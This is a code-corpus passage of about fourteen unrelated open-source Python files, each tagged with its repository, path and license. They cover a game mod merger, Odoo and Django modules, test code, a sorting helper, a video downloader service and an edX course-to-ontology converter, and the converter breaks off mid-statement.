# have, the less often you'd see plugin content. This
# method prevents the core game content from overwhelming
# plugin contents.
allUniques = [ x for x in set(allItems) ]
allUniques.sort()
newList = []
for i in allUniques:
newCount = max([ x['items'].count(i) for x in lls ])
newList += [i] * newCount
newLev['items'] = newList
return newLev
def mergeAllLists(alllists):
mergeables = mergeableLists(alllists)
merged = []
for k in mergeables:
merged.append(mergeLists(mergeables[k]))
return merged
def readCfg(cfg):
# first, open the file and pull all 'data' and 'content' lines, in order
data_dirs = []
mods = []
with open(cfg, 'r') as f:
for l in f.readlines():
# match of form "blah=blahblah"
m = re.search(r'^(.*)=(.*)$', l)
if m:
varname = m.group(1).strip()
# get rid of not only whitespace, but also surrounding quotes
varvalue = m.group(2).strip().strip('\'"')
if varname == 'data':
data_dirs.append(varvalue)
elif varname == 'content':
mods.append(varvalue)
# we've got the basenames of the mods, but not the full paths
# and we have to search through the data_dirs to find them
fp_mods = []
for m in mods:
for p in data_dirs:
full_path = os.path.join(p, m)
if os.path.exists(full_path):
fp_mods.append(full_path)
break
print("Config file parsed...")
return fp_mods
def dumplists(cfg):
llists = []
fp_mods = readCfg(cfg)
for f in fp_mods:
[ ppTES3(parseTES3(x)) for x in oldGetRecords(f, 'TES3') ]
for f in fp_mods:
llists += [ parseLEV(x) for x in oldGetRecords(f, 'LEVI') ]
for f in fp_mods:
llists += [ parseLEV(x) for x in oldGetRecords(f, 'LEVC') ]
for l in llists:
ppLEV(l)
def main(cfg, outmoddir, outmod):
fp_mods = readCfg(cfg)
# first, let's grab the "raw" records from the files
(rtes3, rlevi, rlevc) = ([], [], [])
for f in fp_mods:
print("Parsing '%s' for relevant records" % f)
(rtes3t, rlevit, rlevct) = getRecords(f, ('TES3', 'LEVI', 'LEVC'))
rtes3 += rtes3t
rlevi += rlevit
rlevc += rlevct
# next, parse the tes3 records so we can get a list
# of master files required by all our mods
tes3list = [ parseTES3(x) for x in rtes3 ]
masters = {}
for t in tes3list:
for m in t['masters']:
masters[m[0]] = m[1]
master_list = [ (k,v) for (k,v) in masters.items() ]
# now, let's parse the levi and levc records into
# mergeable lists, then merge them
# creature lists
clist = [ parseLEV(x) for x in rlevc ]
levc = mergeAllLists(clist)
# item lists
ilist = [ parseLEV(x) for x in rlevi ]
levi = mergeAllLists(ilist)
# now build the binary representation of
# the merged lists.
# along the way, build up the module
# description for the new merged mod, out
# of the names of mods that had lists
llist_bc = b''
pluginlist = []
for x in levi + levc:
# ppLEV(x)
llist_bc += packLEV(x)
pluginlist += x['files']
plugins = set(pluginlist)
moddesc = "Merged leveled lists from: %s" % ', '.join(plugins)
# finally, build the binary form of the
# TES3 record, and write the whole thing
# out to disk
if not os.path.exists(outmoddir):
p = Path(outmoddir)
p.mkdir(parents=True)
with open(outmod, 'wb') as f:
f.write(packTES3(moddesc, len(levi + levc), master_list))
f.write(llist_bc)
# And give some hopefully-useful instructions
modShortName = os.path.basename(outmod)
print("\n\n****************************************")
print(" Great! I think that worked. When you next start the OpenMW Launcher, look for a module named %s. Make sure of the following things:" % modShortName)
print(" 1. %s is at the bottom of the list. Drag it to the bottom if it's not. It needs to load last." % modShortName)
print(" 2. %s is checked (enabled)" % modShortName)
print(" 3. Any other OMWLLF mods are *un*checked. Loading them might not cause problems, but probably will")
print("\n")
print(" Then, go ahead and start the game! Your leveled lists should include adjustments from all relevant enabled mods")
print("\n")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--conffile', type = str, default = None,
action = 'store', required = False,
help = 'Conf file to use. Optional. By default, attempts to use the default conf file location.')
parser.add_argument('-d', '--moddir', type = str, default = None,
action = 'store', required = False,
help = 'Directory to store the new module in. By default, attempts to use the default work directory for OpenMW-CS')
parser.add_argument('-m', '--modname', type = str, default = None,
action = 'store', required = False,
help = 'Name of the new module to create. By default, this is "OMWLLF Mod - <today\'s date>.omwaddon.')
parser.add_argument('--dumplists', default = False,
action = 'store_true', required = False,
help = 'Instead of generating merged lists, dump all leveled lists in the conf mods. Used for debugging')
p = parser.parse_args()
# determine the conf file to use
confFile = ''
if p.conffile:
confFile = p.conffile
else:
pl = sys.platform
if pl in configPaths:
baseDir = os.path.expanduser(configPaths[pl])
confFile = os.path.join(baseDir, configFilename)
elif pl == 'win32':
# this is ugly. first, imports that only work properly on windows
from ctypes import *
import ctypes.wintypes
buf = create_unicode_buffer(ctypes.wintypes.MAX_PATH)
# opaque arguments. they are, roughly, for our purposes:
# - an indicator of folder owner (0 == current user)
# - an id for the type of folder (5 == 'My Documents')
# - an indicator for user to call from (0 same as above)
# - a bunch of flags for different things
# (if you want, for example, to get the default path
# instead of the actual path, or whatnot)
# 0 == current stuff
# - the variable to hold the return value
windll.shell32.SHGetFolderPathW(0, 5, 0, 0, buf)
# pull out the return value and construct the rest
baseDir = os.path.join(buf.value, 'My Games', 'OpenMW')
confFile = os.path.join(baseDir, configFilename)
else:
print("Sorry, I don't recognize the platform '%s'. You can try specifying the conf file using the '-c' flag." % p)
sys.exit(1)
baseModDir = ''
if p.moddir:
baseModDir = p.moddir
else:
pl = sys.platform
if pl in configPaths:
baseModDir = os.path.expanduser(modPaths[pl])
elif pl == 'win32':
# this is ugly in exactly the same ways as above.
# see there for more information
from ctypes import *
import ctypes.wintypes
buf = create_unicode_buffer(ctypes.wintypes.MAX_PATH)
windll.shell32.SHGetFolderPathW(0, 5, 0, 0, buf)
baseDir = os.path.join(buf.value, 'My Games', 'OpenMW')
baseModDir = os.path.join(baseDir, 'data')
else:
print("Sorry, I don't recognize the platform '%s'. You can try specifying the conf file using the '-c' flag." % p)
sys.exit(1)
if not os.path.exists(confFile):
print("Sorry, the conf file '%s' doesn't seem to exist." % confFile)
sys.exit(1)
modName = ''
if p.modname:
modName = p.modname
else:
modName = 'OMWLLF Mod - %s.omwaddon' % date.today().strftime('%Y-%m-%d')
modFullPath = os.path.join(baseModDir, modName)
if p.dumplists:
dumplists(confFile)
else:
main(confFile, baseModDir, modFullPath)
# regarding the windows path detection:
#
# "SHGetFolderPath" is deprecated in favor of "SHGetKnownFolderPath", but
# >>> windll.shell32.SHGetKnownFolderPath('{FDD39AD0-238F-46AF-ADB4-6C85480369C7}', 0, 0, buf2)
# -2147024894
|
jmelesky/omwllf
|
omwllf.py
|
Python
|
isc
| 17,912 | 0.00709 |
#!/bin/python
import sys
def getSumOfAP(n, max):
size = (max - 1) // n
return (size * (n + size * (n)) / 2)
def getSumOfMultiples(n):
return (getSumOfAP(3, n) + getSumOfAP(5, n) - getSumOfAP(15, n))
def main():
numInputs = int(raw_input().strip())
for idx in xrange(numInputs):
n = int(raw_input().strip())
ans = getSumOfAP(n)
print(ans)
if __name__ == '__main__':
main()
|
pavithranrao/projectEuler
|
projectEulerPython/problem001.py
|
Python
|
mit
| 429 | 0 |
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint import AnsibleLintRule
class MismatchedBracketRule(AnsibleLintRule):
id = 'ANSIBLE0003'
shortdesc = 'Mismatched { and }'
description = 'If lines contain more { than } or vice ' + \
'versa then templating can fail nastily'
tags = ['templating']
def match(self, file, line):
return line.count("{") != line.count("}")
|
schlueter/ansible-lint
|
lib/ansiblelint/rules/MismatchedBracketRule.py
|
Python
|
mit
| 1,497 | 0 |
# -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
from openerp import models, fields, api
from datetime import *
import time
class clv_tray(models.Model):
_inherit = 'clv_tray'
date = fields.Datetime("Status change date", required=True, readonly=True,
default=lambda *a: datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
date_activation = fields.Datetime("Activation date", required=False, readonly=False)
date_inactivation = fields.Datetime("Inactivation date", required=False, readonly=False)
date_suspension = fields.Datetime("Suspension date", required=False, readonly=False)
state = fields.Selection([('new','New'),
('active','Active'),
('inactive','Inactive'),
('suspended','Suspended')
], string='Status', default='new', readonly=True, required=True, help="")
@api.one
def button_new(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
self.state = 'new'
@api.one
def button_activate(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_activation:
self.date_activation = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'active'
@api.one
def button_inactivate(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_inactivation:
self.date_inactivation = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'inactive'
@api.one
def button_suspend(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_suspension:
self.date_suspension = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'suspended'
|
odoousers2014/odoo_addons-2
|
clv_tray/wkf/clv_tray_wkf.py
|
Python
|
agpl-3.0
| 3,291 | 0.009116 |
def init_actions_(service, args):
"""
this needs to returns an array of actions representing the depencies between actions.
Looks at ACTION_DEPS in this module for an example of what is expected
"""
# some default logic for simple actions
return {
'test': ['install']
}
def test(job):
"""
Tests parsing of a bp with/without default values
"""
import sys
RESULT_OK = 'OK : %s'
RESULT_FAILED = 'FAILED : %s'
RESULT_ERROR = 'ERROR : %s %%s' % job.service.name
model = job.service.model
model.data.result = RESULT_OK % job.service.name
test_repo_path = j.sal.fs.joinPaths(j.dirs.varDir, 'tmp', 'test_validate_model')
sample_bp_path = j.sal.fs.joinPaths('/opt/code/github/jumpscale/jumpscale_core8/tests/samples/test_validate_delete_model_sample.yaml')
try:
if j.sal.fs.exists(test_repo_path):
j.sal.fs.removeDirTree(test_repo_path)
test_repo = j.atyourservice.repoCreate(test_repo_path, 'git@github.com:0-complexity/ays_automatic_cockpit_based_testing.git')
bp_path = j.sal.fs.joinPaths(test_repo.path, 'blueprints', 'test_validate_delete_model_sample.yaml')
j.sal.fs.copyFile(j.sal.fs.joinPaths(sample_bp_path), j.sal.fs.joinPaths(test_repo.path, 'blueprints'))
test_repo.blueprintExecute(bp_path)
action = 'install'
role = 'sshkey'
instance = 'main'
for service in test_repo.servicesFind(actor="%s.*" % role, name=instance):
service.scheduleAction(action=action, period=None, log=True, force=False)
run = test_repo.runCreate(profile=False, debug=False)
run.execute()
test_repo.destroy()
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "actors")):
model.data.result = RESULT_FAILED % ('Actors directory is not deleted')
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "services")):
model.data.result = RESULT_FAILED % ('Services directory is not deleted')
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "recipes")):
model.data.result = RESULT_FAILED % ('Recipes directory is not deleted')
if test_repo.actors:
model.data.result = RESULT_FAILED % ('Actors model is not removed')
if test_repo.services:
model.data.result = RESULT_FAILED % ('Services model is not removed')
if not j.core.jobcontroller.db.runs.find(repo=test_repo.model.key):
model.data.result = RESULT_FAILED % ('Jobs are deleted after repository destroy')
except:
model.data.result = RESULT_ERROR % str(sys.exc_info()[:2])
finally:
job.service.save()
|
Jumpscale/ays_jumpscale8
|
tests/test_services/test_validate_delete_models/actions.py
|
Python
|
apache-2.0
| 2,695 | 0.005937 |
#!/bin/python
def swap(findex, sindex, ar):
ar[findex], ar[sindex] = ar[sindex], ar[findex]
def partition(ar, lo, hi):
'''3 way djisktra partition method'''
start = lo
pivotIndex = (lo+hi)//2
# take the elemet @ hi as the pivot and swap it to pivotIndex position
swap(pivotIndex, hi, ar)
pivotIndex = hi
pivot = ar[pivotIndex]
eq = lo
for index in xrange(lo, hi):
if (ar[eq] == pivot):
eq += 1
if (ar[index] < pivot and index < pivotIndex):
swap(index, lo, ar)
lo += 1
eq +=1
swap(lo, pivotIndex, ar)
return lo
def quickSort(ar):
'''Iterative unstable in-place sort'''
n = len(ar)
hi = n-1
lo = 0
stack = [(lo, hi)]
while stack:
lo, hi = stack.pop()
pivot = partition(ar, lo, hi)
if lo<pivot-1:
stack.insert(0, (lo, pivot-1))
if pivot+1<hi:
stack.insert(0, (pivot+1, hi))
def quickSortRec(ar, n, lo, hi):
'''Recursive unstable in-place sort'''
pivot = partition(ar, lo, hi)
# print lo, pivot, hi
if lo<pivot-1 and lo != pivot:
quickSortRec(ar, n, lo, pivot-1)
# print ' '.join(ar)
if pivot+1<hi and pivot != hi:
quickSortRec(ar, n, pivot+1, hi)
# print ' '.join(ar)
|
codecakes/algorithms
|
algorithms/code30DaysImp/helper/quicksort.py
|
Python
|
mit
| 1,313 | 0.006855 |
from __future__ import absolute_import
import re
import json
import copy
import os
from svtplay_dl.service import Service, OpenGraphThumbMixin
from svtplay_dl.utils.urllib import urlparse
from svtplay_dl.utils import filenamify
from svtplay_dl.fetcher.http import HTTP
from svtplay_dl.fetcher.hds import hdsparse
from svtplay_dl.fetcher.hls import HLS, hlsparse
from svtplay_dl.error import ServiceError
class Vg(Service, OpenGraphThumbMixin):
supported_domains = ['vg.no', 'vgtv.no']
def get(self, options):
data = self.get_urldata()
match = re.search(r'data-videoid="([^"]+)"', data)
if not match:
parse = urlparse(self.url)
match = re.search(r'video/(\d+)/', parse.fragment)
if not match:
yield ServiceError("Can't find video file for: %s" % self.url)
return
videoid = match.group(1)
data = self.http.request("get", "http://svp.vg.no/svp/api/v1/vgtv/assets/%s?appName=vgtv-website" % videoid).text
jsondata = json.loads(data)
if options.output_auto:
directory = os.path.dirname(options.output)
title = "%s" % jsondata["title"]
title = filenamify(title)
if len(directory):
options.output = os.path.join(directory, title)
else:
options.output = title
if self.exclude(options):
yield ServiceError("Excluding video")
return
if "hds" in jsondata["streamUrls"]:
streams = hdsparse(copy.copy(options), self.http.request("get", jsondata["streamUrls"]["hds"], params={"hdcore": "3.7.0"}).text, jsondata["streamUrls"]["hds"])
if streams:
for n in list(streams.keys()):
yield streams[n]
if "hls" in jsondata["streamUrls"]:
streams = hlsparse(jsondata["streamUrls"]["hls"], self.http.request("get", jsondata["streamUrls"]["hls"]).text)
for n in list(streams.keys()):
yield HLS(copy.copy(options), streams[n], n)
if "mp4" in jsondata["streamUrls"]:
yield HTTP(copy.copy(options), jsondata["streamUrls"]["mp4"])
|
leakim/svtplay-dl
|
lib/svtplay_dl/service/vg.py
|
Python
|
mit
| 2,200 | 0.001364 |
from st2actions.runners.pythonrunner import Action
from st2client.client import Client
# Keep Compatability with 0.8 and 0.11 until st2build is upgraded
try:
from st2client.models.datastore import KeyValuePair
except ImportError:
from st2client.models.keyvalue import KeyValuePair
class KVPAction(Action):
def run(self, key, action, st2host='localhost', value=""):
try:
client = Client()
except Exception as e:
return e
if action == 'get':
kvp = client.keys.get_by_name(key)
if not kvp:
raise Exception('Key error with %s.' % key)
return kvp.value
else:
instance = client.keys.get_by_name(key) or KeyValuePair()
instance.id = key
instance.name = key
instance.value = value
kvp = client.keys.update(instance) if action in ['create', 'update'] else None
if action == 'delete':
return kvp
else:
return kvp.serialize()
|
StackStorm/st2cd
|
actions/kvstore.py
|
Python
|
apache-2.0
| 1,061 | 0.000943 |
from django.shortcuts import render, redirect, get_object_or_404
from django.urls import reverse
from mainmodels.models import Course, FeaturedCourse
# Create your views here.
def index(req):
mostPopularCourses = Course.objects.raw('SELECT * FROM mainmodels_course as main_course JOIN (SELECT main_tran.courseID, COUNT(main_tran.takerID) as taker_amount FROM mainmodels_transaction as main_tran GROUP BY main_tran.courseID ORDER BY taker_amount DESC) as main_count ON main_course.courseID = main_count.courseID LIMIT 10;')
featureCourses = FeaturedCourse.objects.raw('SELECT * FROM mainmodels_featuredcourse as main_feat JOIN mainmodels_course as main_course ON main_feat.course_id = main_course.courseID LIMIT 10;')
return render(req, 'index/main.html', {'pageTitle': 'Coursing Field', 'mostPopularCourses': mostPopularCourses, 'featureCourses': featureCourses})
|
PNNutkung/Coursing-Field
|
index/views.py
|
Python
|
apache-2.0
| 876 | 0.004566 |
#!/usr/bin/python
import pygame
import math
import random
import sys
import PixelPerfect
from pygame.locals import *
from water import Water
from menu import Menu
from game import Game
from highscores import Highscores
from options import Options
import util
from locals import *
import health
import cloud
import mine
import steamboat
import pirateboat
import shark
import seagull
def init():
health.init()
steamboat.init()
shark.init()
pirateboat.init()
cloud.init()
mine.init()
seagull.init()
def main():
global SCREEN_FULLSCREEN
pygame.init()
util.load_config()
if len(sys.argv) > 1:
for arg in sys.argv:
if arg == "-np":
Variables.particles = False
elif arg == "-na":
Variables.alpha = False
elif arg == "-nm":
Variables.music = False
elif arg == "-ns":
Variables.sound = False
elif arg == "-f":
SCREEN_FULLSCREEN = True
scr_options = 0
if SCREEN_FULLSCREEN: scr_options += FULLSCREEN
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT),scr_options ,32)
pygame.display.set_icon(util.load_image("kuvake"))
pygame.display.set_caption("Trip on the Funny Boat")
init()
joy = None
if pygame.joystick.get_count() > 0:
joy = pygame.joystick.Joystick(0)
joy.init()
try:
util.load_music("JDruid-Trip_on_the_Funny_Boat")
if Variables.music:
pygame.mixer.music.play(-1)
except:
# It's not a critical problem if there's no music
pass
pygame.time.set_timer(NEXTFRAME, 1000 / FPS) # 30 fps
Water.global_water = Water()
main_selection = 0
while True:
main_selection = Menu(screen, ("New Game", "High Scores", "Options", "Quit"), main_selection).run()
if main_selection == 0:
# New Game
selection = Menu(screen, ("Story Mode", "Endless Mode")).run()
if selection == 0:
# Story
score = Game(screen).run()
Highscores(screen, score).run()
elif selection == 1:
# Endless
score = Game(screen, True).run()
Highscores(screen, score, True).run()
elif main_selection == 1:
# High Scores
selection = 0
while True:
selection = Menu(screen, ("Story Mode", "Endless Mode", "Endless Online"), selection).run()
if selection == 0:
# Story
Highscores(screen).run()
elif selection == 1:
# Endless
Highscores(screen, endless = True).run()
elif selection == 2:
# Online
Highscores(screen, endless = True, online = True).run()
else:
break
elif main_selection == 2:
# Options
selection = Options(screen).run()
else: #if main_selection == 3:
# Quit
return
if __name__ == '__main__':
main()
|
italomaia/turtle-linux
|
games/FunnyBoat/run_game.py
|
Python
|
gpl-3.0
| 3,190 | 0.006583 |
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Portal Partner Fix',
'version': '8.0.1.0.0',
'category': '',
'sequence': 14,
'summary': '',
'description': """
Portal Partner Fix
==================
Let user read his commercial partner
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'portal',
],
'data': [
'security/portal_security.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
dvitme/odoo-addons
|
portal_partner_fix/__openerp__.py
|
Python
|
agpl-3.0
| 1,565 | 0.000639 |
#!/usr/bin/python
import os
from autotest.client import utils
version = 1
def setup(tarball, topdir):
srcdir = os.path.join(topdir, 'src')
utils.extract_tarball_to_dir(tarball, srcdir)
os.chdir(srcdir)
utils.make()
os.environ['MAKEOPTS'] = 'mandir=/usr/share/man'
utils.make('install')
os.chdir(topdir)
pwd = os.getcwd()
tarball = os.path.join(pwd, 'grubby-8.11-autotest.tar.bz2')
utils.update_version(os.path.join(pwd, 'src'),
False, version, setup, tarball, pwd)
|
nacc/autotest
|
client/deps/grubby/grubby.py
|
Python
|
gpl-2.0
| 518 | 0.003861 |
###########################################################################
# (C) Vrije Universiteit, Amsterdam (the Netherlands) #
# #
# This file is part of AmCAT - The Amsterdam Content Analysis Toolkit #
# #
# AmCAT is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Affero General Public License as published by the #
# Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# AmCAT is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public #
# License for more details. #
# #
# You should have received a copy of the GNU Affero General Public #
# License along with AmCAT. If not, see <http://www.gnu.org/licenses/>. #
###########################################################################
import json
from amcat.models import CodingRule, CodingSchemaField, Code
from amcat.models.coding.codingruletoolkit import schemarules_valid, parse, to_json, EQUALS, \
clean_tree, NOT, OR
from amcat.models.coding.codingschema import ValidationError
from amcat.tools import amcattest
class TestCodingRuleToolkit(amcattest.AmCATTestCase):
def condition(self, s, c):
return CodingRule(codingschema=s, condition=c)
def test_schemafield_valid(self):
schema_with_fields = amcattest.create_test_schema_with_fields()
schema = schema_with_fields[0]
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "()").save()
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "(3==2)").save()
self.assertFalse(schemarules_valid(schema))
CodingRule.objects.all().delete()
# Test multiple (correct) rules
self.condition(schema, "()").save()
self.condition(schema, "()").save()
self.condition(schema, "()").save()
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "(3==2)").save()
self.assertFalse(schemarules_valid(schema))
def test_to_json(self):
import functools
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
schema_with_fields = amcattest.create_test_schema_with_fields()
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema_with_fields[0])
tree = to_json(parse(c("{}=={}".format(code_field.id, o1.id))))
self.assertEquals(json.loads(tree), {"type": EQUALS, "values": [
{"type": "codingschemafield", "id": code_field.id},
{"type": "code", "id": o1.id}
]})
tree = parse(c("{}=={}".format(code_field.id, o1.id)))
self.assertEquals(json.dumps(to_json(tree, serialise=False)), to_json(tree))
def test_clean_tree(self):
import functools
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
codebook, codebook_codes = amcattest.create_test_codebook_with_codes()
schema_with_fields = amcattest.create_test_schema_with_fields(codebook=codebook)
schema = schema_with_fields[0]
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema)
tree = parse(c("{code_field.id}=={o1.id}".format(**locals())))
self.assertRaises(ValidationError, clean_tree, schema, tree)
tree = parse(c("{code_field.id}=={code.id}".format(code_field=code_field, code=codebook.codes[0])))
self.assertEquals(clean_tree(schema, tree), None)
self.assertRaises(ValidationError, clean_tree, amcattest.create_test_schema_with_fields()[0], tree)
def test_parse(self):
import functools
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
schema_with_fields = amcattest.create_test_schema_with_fields()
schema = schema_with_fields[0]
codebook = schema_with_fields[1]
text_field = schema_with_fields[2]
number_field = schema_with_fields[3]
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema)
# Empty conditions should return None
self.assertEquals(parse(c("")), None)
self.assertEquals(parse(c("()")), None)
# Recursion should be checked for
cr = CodingRule.objects.create(codingschema=schema, label="foo", condition="()")
cr.condition = str(cr.id)
self.assertRaises(SyntaxError, parse, cr)
# Nonexisting fields should raise an error
cr.condition = "0==2"
self.assertRaises(CodingSchemaField.DoesNotExist, parse, cr)
cr.condition = "{}==0".format(code_field.id)
self.assertRaises(Code.DoesNotExist, parse, cr)
cr.condition = "0"
self.assertRaises(CodingRule.DoesNotExist, parse, cr)
cr.condition = "{}=={}".format(code_field.id, o1.id)
self.assertTrue(parse(cr) is not None)
# Wrong inputs for fields should raise an error
for inp in ("'a'", "0.2", "u'a'"):
cr.condition = "{}=={}".format(number_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
for inp in ("'a'", "0.2", "u'a'", repr(str(o1.id))):
cr.condition = "{}=={}".format(code_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
for inp in ("'a'", "0.2", "2"):
cr.condition = "{}=={}".format(text_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
# "Good" inputs shoudl not yield an error
for field, inp in ((number_field, 1), (text_field, "u'a'"), (code_field, o1.id)):
cr.condition = "{}=={}".format(field.id, inp)
self.assertTrue(parse(cr) is not None)
# Should accept Python-syntax (comments, etc)
cr.condition = """{}==(
# This should be a comment)
{})""".format(text_field.id, "u'a'")
self.assertTrue(parse(cr) is not None)
## Testing output
tree = parse(c("not {}".format(cr.id)))
self.assertEquals(tree["type"], NOT)
self.assertTrue(not isinstance(tree["value"], CodingRule))
tree = parse(c("{}=={}".format(text_field.id, "u'a'")))
self.assertEquals(tree, {"type": EQUALS, "values": (text_field, u'a')})
cr.save()
tree = parse(c("{cr.id} or {cr.id}".format(cr=cr)))
self.assertEquals(tree, {"type": OR, "values": (parse(cr), parse(cr))})
# Should accept greater than / greater or equal to / ...
parse(c("{number_field.id} > 5".format(**locals())))
parse(c("{number_field.id} < 5".format(**locals())))
parse(c("{number_field.id} >= 5".format(**locals())))
parse(c("{number_field.id} <= 5".format(**locals())))
# ..but not if schemafieldtype is text or code
self.assertRaises(SyntaxError, parse, c("{text_field.id} > 5".format(**locals())))
self.assertRaises(SyntaxError, parse, c("{code_field.id} > 5".format(**locals())))
|
amcat/amcat
|
amcat/models/coding/tests/codingruletoolkit.py
|
Python
|
agpl-3.0
| 7,493 | 0.001735 |
import json
from owlready import *
# input parameters
file_path = sys.argv[1]
onto_path = sys.argv[2]
# load ontology
onto = get_ontology(onto_path).load()
# course found list
course_ids = []
# for each course, find the active version (avoid multi instances of one course)
with open(file_path + '/modulestore.active_versions.json','r') as f:
for line in f:
course = json.loads(line)
# for one course, only use its published version
course_id = course['versions']['published-branch']['$oid']
course_ids.append([course_id,'-v'+str(course['schema_version'])+':'+course['org']+'+'+course['course']+'+'+course['run']])
f.closed
for one_course in course_ids:
course_id = one_course[0]
# for each publish version we found, search for its structure data in json file
with open(file_path + '/modulestore.structures.json', 'r') as f:
for line in f:
obj = json.loads(line)
if obj['_id']['$oid'] == course_id:
# temp save this data to a json file
print('=======Find one=======')
print(course_id)
with open(file_path + '/' + course_id + '.json', 'w+') as fout:
json.dump(obj,fout)
fout.closed
break
f.closed
# function to find a instance by its id
def find_obj_by_oid(obj_list, obj_oid):
for one_obj in obj_list:
if one_obj.name == obj_oid:
return one_obj
return None
# function to find a instance by its xml name
def find_obj_by_xml_id(obj_list, obj_xml_id, obj_name):
for one_obj in obj_list:
if hasattr(one_obj, obj_name + '_xml_id') and getattr(one_obj, obj_name + '_xml_id')[0] == obj_xml_id:
return one_obj
return None
# for each course we found
for one_course in course_ids:
course_id = one_course[0]
# open its structure json file
print('===========deal with course : ' + course_id + '===========')
with open(file_path + '/' + course_id + '.json','r') as f:
for line in f:
obj = json.loads(line)
# find all its blocks
blocks = obj['blocks']
for block in blocks:
# for each block, if its type defined in ontology
obj_name = block['block_type']
if ('course_model.' + obj_name) in str(onto.classes):
obj_oid = block['definition']['$oid']
obj_xml_id = block['block_id']
# create an ontology individual for this block
temp_obj = getattr(onto, obj_name)(obj_oid)
# set xml id data property
getattr(temp_obj, obj_name+'_xml_id').append(obj_xml_id)
# set display name property
if 'display_name' in block['fields'].keys():
obj_display_name = block['fields']['display_name']
getattr(temp_obj,obj_name+'_display_name').append(obj_display_name)
# if this instance is a course
if obj_name == 'course':
temp_id = obj_xml_id + str(one_course[1])
course_org = temp_id.split(':')[-1].split('+')[0]
course_tag = temp_id.split(':')[-1].split('+')[1]
# set course id, course org and course tag
getattr(temp_obj,obj_name+'_id').append(temp_id)
getattr(temp_obj,obj_name+'_org').append(course_org)
getattr(temp_obj,obj_name+'_tag').append(course_tag)
# create object property
for block in blocks:
obj_name = block['block_type']
if ('course_model.' + obj_name) in str(onto.classes):
obj_oid = block['definition']['$oid']
obj_list = onto.instances
temp_obj = find_obj_by_oid(obj_list, obj_oid)
# find sub-level instance of this block
temp_sub_obj_list = block['fields']['children']
for sub_obj in block['fields']['children']:
sub_obj_name = sub_obj[0]
sub_obj_xml_id = sub_obj[1]
sub_obj_list = onto.instances
temp_sub_obj = find_obj_by_xml_id(sub_obj_list, sub_obj_xml_id, sub_obj_name)
if obj_name == 'vertical':
temp_sub_obj_name = 'xblock'
else:
